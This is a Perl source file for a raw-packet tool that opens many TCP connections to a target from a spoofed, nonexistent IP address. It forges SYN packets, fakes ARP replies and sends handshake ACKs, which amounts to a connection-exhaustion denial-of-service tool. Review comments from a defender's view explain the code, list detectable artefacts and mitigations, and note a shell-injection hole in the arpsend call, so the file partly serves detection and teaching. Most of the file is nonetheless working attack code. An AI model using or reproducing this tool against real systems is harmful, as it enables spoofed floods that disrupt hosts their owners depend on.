#! /usr/bin/perl
###########################################################
# Tool for opening a large number of TCP connections
# Author: Ernst Pisch
#
# Prerequisites:
#   libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z - usually
#           already part of Linux)
#   Perl module Net::RawIP (http://quake.skif.net/RawIP/ or
#           http://www.ic.al.lg.ua/~ksv/)
#   Libnet library (http://www.packetfactory.net/libnet/)
#   arpsend (http://wwwnet.princeton.edu/software/arpsend/)
###########################################################
#
# What the code below does, as far as this file shows:
#   - forks into three processes that share the parsed options:
#     the parent sniffs for an ARP request from the target for the
#     fake IP ($opt_f) and calls arpsend; the first child sniffs for
#     packets from the target to the fake IP and, on SYN/ACK, sends
#     the final ACK of the handshake; the grandchild sends $opt_n+1
#     raw SYN segments with a forged source IP and a randomly
#     generated source MAC.
#   - net effect on the target: established connections from an
#     address that no real host owns.
#
# Review notes (defender's view):
#   - Raw frames and pcap capture require root. There is no
#     `use strict`/`use warnings`; all state lives in package
#     globals ($opt_*, $a, $b, $c, $d, $fmac, $fport, ...).
#   - Artefacts a sensor can key on, taken from the code: the
#     source MAC always starts with "00:" and is generated once per
#     run; TCP source ports start in 0..15 and increase by one per
#     SYN; initial sequence numbers start in 0..15 and increase by
#     one per SYN; any ARP reply for $opt_f (if the arpsend branch
#     fires, see arpreply) advertises that same random MAC.
#   - Mitigation is on the target (per-source connection limits)
#     and on the segment (ARP inspection for MACs/IPs not in the
#     inventory).

use Net::RawIP;
# Legacy getopts.pl: sets package globals $opt_i, $opt_t, ... for
# the options listed here (Getopt::Std / Getopt::Long are the
# modern equivalents).
require 'getopts.pl';

Getopts('i:t:m:f:p:n:');

# -t, -m, -f and -p are mandatory; -i and -n get defaults below.
die "Usage $0 -i device -t Target-IP -m Target-MAC -f Fake-IP -p TCP-Port -n count\
\t-i device\t\tEthernet-Interface (default: eth0)\
\t-t Target-IP\t\tIP-Address of Target-Host\
\t-m Target-MAC\t\tMAC-Address of Target-Host\
\t-f Fake-IP\t\tIP of a non-existent Host\n
\t-p TCP-Port\t\tPort on the Target-Host\
\t-n count\t\tNumber of times to send\n"
   unless ($opt_t && $opt_m && $opt_f && $opt_p);

# set default values
# NOTE(review): `eth0` is a bareword string here; this only parses
# because the file does not `use strict`.
$opt_i = eth0 unless $opt_i;
$opt_n = 1 unless $opt_n;

$arp_req = "\x00\x01";	# ARP opcode "request" as it appears in the ARP packet
# TCP source port of the fictitious host: starts at a value in 0..15
# (int rand 16) and is incremented by one for every SYN sent below.
$fport = sprintf("%d",int rand 16);
# MAC address of the fictitious host, generated once per run.
$fmac = &GenMAC;

# BPF filter that matches ARP requests from the target for the fake IP
$filta = "arp and src host $opt_t and dst host $opt_f";
# BPF filter that matches reply packets from the target to the fake IP
$filtb = "src host $opt_t and dst host $opt_f";
# Passed to pcapinit() below; presumably snaplen and read timeout --
# confirm against the Net::RawIP documentation.
$size = 1500;
$tout = 30;

# Installed before the forks, so all three processes inherit it.
$SIG{INT} = sub { die "Process PID:$$ dying\n"};

# Process tree: parent -> first branch, first child -> second branch,
# grandchild -> third branch. fork() returning undef (failure) is not
# checked and would also land a process in the last branch.
if (fork) {
    # Parent: ARP listener. NOTE(review): $a and $b are the sort()
    # package variables; using them as object holders works but is
    # fragile if any sort block is added later.
    $a = new Net::RawIP;
    my $pcap = $a->pcapinit($opt_i,$filta,$size,$tout);
    # Wait for the target's ARP request. Count 1 vs. -1 below follows
    # pcap_loop() semantics (one packet vs. until error) -- confirm in
    # Net::RawIP. \@a is the callback's user data (the array @a, not
    # the object held in $a).
    loop $pcap,1,\&arpreply,\@a;
} elsif (fork) {
    # First child: handshake completer. $b is reused inside ackreply
    # to parse each captured frame; $d is the sender for the ACK.
    $b = new Net::RawIP;
    my $pcap = $b->pcapinit($opt_i,$filtb,$size,$tout);
    $d = new Net::RawIP;
    # Wait for the target's SYN/ACK (runs until the capture errors out)
    loop $pcap,-1,\&ackreply,\@b;
} else {
    # Grandchild: SYN sender. Initial sequence number starts in 0..15
    # and is incremented by one per SYN.
    $sequence = sprintf("%d",int rand 16);
    $c = new Net::RawIP;
    # NOTE(review): `<=` makes this loop run $opt_n+1 times.
    for ($i=0;$i <= $opt_n; $i++){
#       sleep 1;
        # Raw Ethernet frame to the target's MAC from the random MAC,
        # carrying an IP packet with the forged source $opt_f and a
        # TCP SYN to $opt_p.
        $c->ethnew($opt_i, dest => $opt_m, source => $fmac);
        $c->set ({ ip => {saddr => $opt_f, daddr => $opt_t },
                   tcp => {dest => $opt_p, source => $fport++, seq => $sequence++, syn => 1 } });
        $c->ethsend;
    }
}

# Returns a MAC string of the form "00:hh:hh:hh:hh:hh": the first
# octet is fixed to 00, the other five are built from two single
# random hex digits each (sprintf "%x" of int rand 16 is always one
# character).
sub GenMAC {
    my $tmp_mac="00";
    my $i=0;
    # generate random mac-address
    while($i++ < 5) {
        $tmp_mac.=":" . sprintf("%x",int rand 16);
        $tmp_mac.=sprintf("%x",int rand 16);
    }
    return($tmp_mac);
}

# pcap callback for the ARP listener. Ignores its arguments.
# NOTE(review): $arp_op is not assigned anywhere in this file, so as
# written the comparison is against undef (a warning under
# `use warnings`).
sub arpreply {
    if ( $arp_op eq $arp_req ) {
        # NOTE(review): shell-string form of system(); every $opt_*
        # value and $fmac is interpolated into the command line, so
        # option values containing shell metacharacters are
        # interpreted by the shell -- and this runs as root. The
        # list form system($cmd, @args) would avoid the shell.
        system "arpsend -w -o 2 -i $opt_i -S $fmac -s $opt_f -E $fmac -e $opt_m -T $opt_m -t $opt_t";
    }
}

# pcap callback for the SYN/ACK listener: parses the captured frame
# and answers a SYN/ACK with the final ACK of the handshake.
sub ackreply {
    # $_[2] is presumably the captured frame (Net::RawIP passes user
    # data, pcap header, packet -- confirm). The first 14 bytes, the
    # Ethernet header, are dropped so bset() parses from the IP header.
    $b->bset(substr( $_[2],14));
    # Field order follows the qw list: 0 source, 1 dest, 2 seq,
    # 3 ack_seq, 4 ack flag, 5 syn flag.
    my @pak = $b->get({ tcp=>[qw(source dest seq ack_seq ack syn)]});
    # Bitwise AND of the two flag values: true only when both SYN and
    # ACK are set.
    if ( $pak[4] & $pak[5] ) {
        # Ports are swapped relative to the captured packet; seq is the
        # captured ack_seq + 1 and ack_seq the captured seq + 1.
        $d->ethnew($opt_i, dest => $opt_m, source => $fmac);
        $d->set({ ip => {saddr => $opt_f, daddr => $opt_t },
                  tcp => {dest => $pak[0], source => $pak[1], seq => $pak[3]+1, ack_seq => $pak[2]+1, ack => 1 } });
        $d->ethsend;
    }
}